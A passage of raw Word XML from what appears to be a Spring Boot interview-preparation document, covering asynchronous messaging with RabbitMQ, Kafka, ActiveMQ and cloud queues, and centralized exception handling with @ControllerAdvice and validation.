      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message broker</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ache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to communicate asynchronously between two Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAAC5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Message Broker (e.g., RabbitMQ or Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672AF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RabbitMQ or Kafka on your local machine or in the cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0BF5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tall the necessary Spring dependencies for RabbitMQ/Kafka in your pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B487C0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RabbitMQ --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC52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7878B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76002B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mqp&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9D6A6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507F943" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF26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Kafka --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725B6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CD48A4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kafka&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9AA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kafka&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398E90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C30A36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roducer Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FAB6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ucer application sends messages to the queue (e.g., RabbitMQ or Kafka).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D421D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core.RabbitTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DF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1741DE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51195CB" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EAC5D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9D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21364539" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0A6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BD9A9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85107A2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479E9B2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AB233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queueName", message); // Send to queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11709E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6AA13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B8C4A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sumer Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D21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sumer application listens for messages from the queue and processes them asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCBA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annotation.RabbitListener;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E799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7108B56B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7624BD0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A74E3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713B23C2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D7CC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queueName")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CE25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06FF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rocess the message asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F86D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42913F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95038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A3E30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B48D5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imple asynchronous calls, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Async</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation and </w:t>
      </w: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for non-blocking HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443342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calable, decoupled communication between services, you can us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for messaging-based communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41353E5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approaches help achieve asynchronous communication between two Spring Boot applications depending on the scale and needs of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BB12A" w14:textId="6A2AF3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688" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1E1E50" w14:textId="7B983812" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF32B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="666" w:name="_Toc197867880"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you worked messaging services</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="666"/>
    </w:p>
    <w:p w14:paraId="66543BAE" w14:textId="7747B85F" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A3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abbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A68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deal for event-driven architectures, background job processing, or decoupling services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76FE8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You can use Spring AMQP for integrating RabbitMQ with Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060EA55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AE97B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A25853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C7576DD" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015DBF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496A1B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1C6727A" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5522698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436306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myQueue", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA9F0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E2B1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CC919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5F93E1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05CEFC94" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BC6A8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myQueue")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075039D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2BC834A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A98464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ECBFAC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261D72D"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pache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88BC7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data streaming, event sourcing, and log aggregation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5661D7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Kafka provides easy-to-use integration with Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A37E9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53B8AD8"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4A583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Producer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726F500" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C91AB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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63EDE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KafkaTemplate&lt;String, String&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AA7230" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEB68F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6E278BA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Template.send("myTopic", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2636B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B0D5C8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A459D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E18B93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Consumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55877BAE" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A09B3A"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Listener(topics = "myTopic", groupId = "group_id")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316FD1D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listen(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D11F4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56A9FD9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73AF4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B171912"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ctiveMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002993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eMQ is another popular message broker that supports multiple messaging protocols like JMS, MQTT, and AMQP. It allows asynchronous messaging between distributed systems or components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56188F5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for enterprise integration patterns and asynchronous messaging in Java applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F00D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provides integration with ActiveMQ via spring-boot-starter-activemq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F842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94EB74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BD9B4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Producer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7E5B2" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56339D2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51FCF1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msTemplate jmsTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005744A6" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF151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7AD9E4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Template.convertAndSend("myQueue", message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411A2C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39D74C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966FCE"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084C06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Consumer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F8692" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFA7C5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Listener(destination = "myQueue")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81AFC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3418E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74FB447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7E051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96DD77"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mazon SQS (Simple Queue Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BACCF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Suitable for cloud-native applications that require message queuing and asynchronous processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0CC5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AWS or Spring Cloud Messaging provides integration with SQS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0FFF5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Google Pub/Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4563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oogle Cloud Pub/Sub is a messaging service that allows you to send and receive messages between independent applications. It is highly scalable and ideal for event-driven architectures in the cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C8E7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messaging, event-driven architectures, and scalable message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62493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GCP offers support for Google Pub/Sub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479EAE3F" w14:textId="77777777" w:rsidR="00944A37"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B1FCBC">
          <v:rect id="_x0000_i2689" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F91B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Messaging Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6B3E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coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices can communicate with each other without being tightly coupled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFD61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Allows tasks to be executed in the background, improving system efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14852D4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alability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messaging systems like Kafka and RabbitMQ can handle large volumes of data, making them suitable for high-throughput applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426355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liability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Systems like Kafka and RabbitMQ provide durability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D823F7"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vent-Driven</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messaging systems are ideal for event-driven architectures where services react to events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EFEA5F" w14:textId="67D9D4A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690" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B786A" w14:textId="2F47A83B" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB6369">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="667" w:name="_Toc197867881"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you handle errors / exceptions in your project</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="667"/>
    </w:p>
    <w:p w14:paraId="12CDEB41" w14:textId="553109F2" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE640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handling errors and exceptions is typically done using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>centralized exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a combination of the following techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6E2E6"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476B59">
          <v:rect id="_x0000_i2691" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB5390"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ControllerAdvice and @ExceptionHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1BC7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most common way to handle exceptions globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68F26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782868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41366129" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3A403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ResourceNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBEE53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ResourceNotFound(ResourceNotFoundException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C10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Resource not found: " + ex.getMessage(), HttpStatus.NOT_FOUND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD2128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1D1130" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19296A5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4E0F72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lobalException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576567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Internal error: " + ex.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF7E5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3FE1C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6929F9C"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EDE489">
          <v:rect id="_x0000_i2692" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201E143"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 Exception Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BAD0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your own exceptions for better clarity and handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F995EF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NotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC6AB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ourceNotFoundException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6D1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02D1538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7F3FC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3BFBE25"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65463F">
          <v:rect id="_x0000_i2693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE6908"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ResponseEntityExceptionHandler (for Validation Errors, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E403EB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end Spring’s built-in handler for more control over validation errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B287B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590C2D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Handler extends ResponseEntityExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A9F69" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D24F7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F3F7DA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ResponseEntity&lt;Object&gt; handleMethodArgumentNotValid(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3EEA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thodArgumentNotValidException ex,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A60EC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Headers headers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191809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atus status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE4C3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Request request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD9D89" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50517CB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p&lt;String, String&gt; errors = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B550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getBindingResult().getFieldErrors().forEach(err -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A86E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rrors.put(err.getField(), err.getDefaultMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC601B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A3CB3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rrors, HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B976C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0ED6D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558798"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4496B6">
          <v:rect id="_x0000_i2694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FAB9C"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Validation with @Valid and @NotNull, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A74DE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employee")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75643C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Employee&gt; createEmployee(@Valid @RequestBody Employee emp) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A6EA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mployeeService.save(emp), HttpStatus.CREATED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24C3E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C7B7132"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55683F4">
          <v:rect id="_x0000_i2695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B25891"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Using ResponseEntity with appropriate status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC7E81"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ually returning structured error responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DEDC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id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8FAF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gt; getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0846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 = employeeService.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4814903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 with id: " + id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECEF7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC44A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D2CE59"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11E8E">
          <v:rect id="_x0000_i2696" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40432D0F"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4237"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4A4953B2" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
